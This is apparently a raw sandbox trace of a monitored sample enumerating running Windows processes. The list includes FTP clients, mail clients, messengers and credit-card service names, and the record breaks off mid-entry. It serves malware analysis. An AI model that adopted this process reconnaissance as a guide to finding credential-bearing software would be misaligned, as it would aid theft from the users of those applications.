1 [0223.502] Sleep (dwMilliseconds=0x64) [0223.639] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1950 [0223.653] Process32First (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.655] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0223.657] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0223.659] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.661] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0223.663] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.664] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0223.666] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0223.668] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0223.670] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.672] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.674] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0223.723] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.725] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.727] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.729] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.731] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.733] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.735] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.738] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0223.740] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0223.764] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.766] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0223.768] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.770] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0223.772] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0223.775] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0223.834] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0223.837] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0223.840] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0223.842] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.844] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0223.847] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0223.851] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0223.853] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.856] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0223.859] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0223.861] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0223.863] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0223.867] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0223.870] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0223.915] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0223.918] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0223.922] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0223.925] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0223.927] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0223.929] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0223.932] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0223.934] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0223.937] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0223.939] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0223.941] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0223.944] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0223.946] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0223.949] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0223.954] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0223.956] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0223.959] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0223.962] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0223.965] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0223.969] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0223.972] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0223.975] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0223.978] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0223.981] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0223.984] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0223.986] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0223.989] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0223.998] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0224.001] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0224.004] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0224.007] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0224.010] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0224.013] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0224.016] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0224.018] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0224.021] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0224.024] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0224.027] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0224.029] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0224.048] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0224.051] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0224.054] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0224.057] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0224.060] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, 